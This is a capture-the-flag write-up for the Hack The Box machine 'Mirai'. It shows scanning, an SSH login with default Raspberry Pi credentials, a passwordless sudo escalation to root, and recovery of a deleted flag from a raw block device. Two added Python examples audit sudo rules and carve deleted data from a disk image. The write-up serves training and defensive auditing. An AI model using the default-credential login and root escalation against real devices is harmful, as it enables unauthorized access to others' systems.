HTB: Mirai

Details

This machine is Mirai from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.48
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 15:09 EDT
Nmap scan report for 10.10.10.48
Host is up (0.058s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp    open  domain  dnsmasq 2.76
80/tcp    open  http    lighttpd 1.4.35
1831/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.24 seconds

Mirai

I ran dirb against the port 80 server

root@kali:~# dirb http://10.10.10.48
[SNIP]
==> DIRECTORY: http://10.10.10.48/admin/
[SNIP]

I went to it in the browser

Screenshot 1

I tried the default Raspberry Pi credentials over SSH

ssh pi@10.10.10.48

with password

raspberry

Which led to

pi@raspberrypi:~ $

And

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
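
That `sudo -l` listing is the whole privilege-escalation path: the `(ALL) NOPASSWD: ALL` rule lets pi run anything as root without even a password. As an added example (my code, not from the write-up), here is a small Python checker that parses `sudo -l` output and grades each rule, so the same finding can come out of an audit script rather than a manual read. The sample text is a reconstruction of the listing above; the parser and the severity labels are my own assumptions about what a hardening check should report.

```python
"""Grade the rules in the text output of `sudo -l`.

Added example, not code from the write-up. The sample text is a
reconstruction of the listing above; the parser and severity labels are
my own assumptions about what a hardening check should report.
"""
import re

# Constructed sample in the same shape as the box's `sudo -l` output.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
"""

# One rule line: "(runas_user[ : runas_group]) [TAG: ...] command list"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(text):
    """Return (runas, tags, commands) for each rule under the 'may run' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            rules.append((m.group("runas").strip(), tags, m.group("cmds").strip()))
    return rules


def assess(rules):
    """One finding per rule; an unrestricted root rule without a password is the worst case."""
    findings = []
    for runas, tags, cmds in rules:
        runas_user = runas.split(":")[0].strip()      # "ALL : ALL" -> "ALL"
        as_root = runas_user in ("ALL", "root")
        if cmds == "ALL" and as_root:
            if "NOPASSWD" in tags:
                findings.append("CRITICAL: any command as root, no password")
            else:
                findings.append("HIGH: any command as root, password required")
        elif "NOPASSWD" in tags:
            findings.append("MEDIUM: passwordless rule for %s" % cmds)
        else:
            findings.append("INFO: %s as %s" % (cmds, runas))
    return findings


if __name__ == "__main__":
    rules = parse_sudo_l(SAMPLE_SUDO_L)
    for rule, finding in zip(rules, assess(rules)):
        print(finding, "<-", rule)
```

Feed it the real `sudo -l` output of each account you audit; either of the two rules above on its own is enough to make that account equivalent to root, the NOPASSWD one without even the account's password.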

I can already be root

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# 
root@raspberrypi:/home# cd /root
root@raspberrypi:~# ls -la
drwx------  3 root root 4096 Aug 27  2017 .
drwxr-xr-x 35 root root 4096 Aug 14  2017 ..
-rw-------  1 root root  549 Dec 24  2017 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r--r--  1 root root   76 Aug 14  2017 root.txt
drwx------  2 root root 4096 Aug 27  2017 .ssh
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

It seems the box isn't done yet, then. Before digging in I took a look for the user flag

root@raspberrypi:/media/usbstick# find / -name user.txt 2>/dev/null
/home/pi/Desktop/user.txt
root@raspberrypi:/media/usbstick# cat /home/pi/Desktop/user.txt
[REDACTED]

Now I look for the root flag

root@raspberrypi:~# cd /media/usbstick/

root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Now, deleting a file only unlinks it; the data blocks stay on the device until they are overwritten, so it is possible to recover the contents of some deleted files by grepping the raw block device

root@raspberrypi:/media/usbstick# grep --binary-files=text 'root' --context=100 /dev/sdb > /tmp/root.txt

Check the results

root@raspberrypi:/media/usbstick# cat /tmp/root.txt
[SNIP]
�|}*,.������+-���3d3e483143ff12ec505d026fa13e020b
[SNIP]

There we go
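
The grep over /dev/sdb works because deletion removes the directory entry, not the data blocks. The following Python example (added here, not part of the write-up) does the same job as that grep but streamed: it scans a block device or image in fixed-size reads, keeps an overlap so a hit that straddles two reads is not missed, and reports each hit with its byte offset and surrounding bytes. The "USB stick" image, the deleted file's text and the `<PLACEHOLDER-FLAG>` value are all constructed inline; nothing in it comes from the box.

```python
"""Carve a deleted file's text out of a raw block device or disk image.

Added example, not code from the write-up. Deleting a file unlinks its
directory entry but leaves its data blocks on the device until they are
reused, which is what the grep over /dev/sdb relies on. This scanner
streams the device in fixed-size reads (so it works on devices far
larger than RAM), keeps an overlap so a hit split across two reads is
still found, and returns each hit with its byte offset and context.
The 'USB stick' image, the deleted file's text and the flag placeholder
are all constructed here.
"""
import os
import tempfile

CHUNK = 64 * 1024

# Constructed image contents (assumptions, not data from the box).
FILLER = bytes(range(256))          # cycling 0x00..0xff: never contains "oo", so no stray "root"
DELETED_FILE = b"I lost my original root.txt! backup flag: <PLACEHOLDER-FLAG>\n"
PLANT_OFFSETS = (1000, 70000)       # where the 'deleted' file's blocks still sit


def build_image(path, size=200 * 1024):
    """Write a constructed image: filler blocks with the deleted file's data left in place."""
    img = bytearray((FILLER * (size // len(FILLER) + 1))[:size])
    for off in PLANT_OFFSETS:
        img[off:off + len(DELETED_FILE)] = DELETED_FILE
    with open(path, "wb") as fh:
        fh.write(img)
    return path


def carve(device_path, needle, context=64, chunk_size=CHUNK):
    """Return [(offset, surrounding_bytes)] for every occurrence of needle on the device."""
    if isinstance(needle, str):
        needle = needle.encode()
    tail_len = len(needle) - 1 + context   # bytes a hit near the end of buf may still need
    hits = []
    with open(device_path, "rb") as dev:
        buf = b""
        base = 0        # absolute device offset of buf[0]
        next_scan = 0   # absolute offset of the first match start not yet reported
        while True:
            chunk = dev.read(chunk_size)
            eof = not chunk
            buf += chunk
            # Report a hit only once its trailing context is in buf (always true at EOF).
            limit = len(buf) if eof else len(buf) - tail_len
            pos = buf.find(needle, next_scan - base)
            while pos != -1 and pos < limit:
                lo = max(0, pos - context)
                hi = min(len(buf), pos + len(needle) + context)
                hits.append((base + pos, bytes(buf[lo:hi])))
                pos = buf.find(needle, pos + 1)
            if eof:
                break
            next_scan = base + max(limit, 0)
            drop = max(0, limit - context)     # keep leading context for deferred hits
            buf = buf[drop:]
            base += drop
    return hits


def expected_offsets():
    """Offsets at which the constructed image holds the word 'root'."""
    return [off + DELETED_FILE.index(b"root") for off in PLANT_OFFSETS]


def recover_demo(chunk_size=CHUNK):
    """Build the image in a temp dir, carve it for 'root' and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        img = build_image(os.path.join(tmp, "usb.img"))
        return carve(img, "root", context=64, chunk_size=chunk_size)


if __name__ == "__main__":
    for off, ctx in recover_demo():
        print("offset %d: %r" % (off, ctx))
```

Point `carve()` at a real device node or a `dd` image instead of the constructed file to use it for forensics. The same fact cuts the other way for defenders: data on removable media is not gone after `rm`, so media that held secrets needs wiping or encryption rather than deletion.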
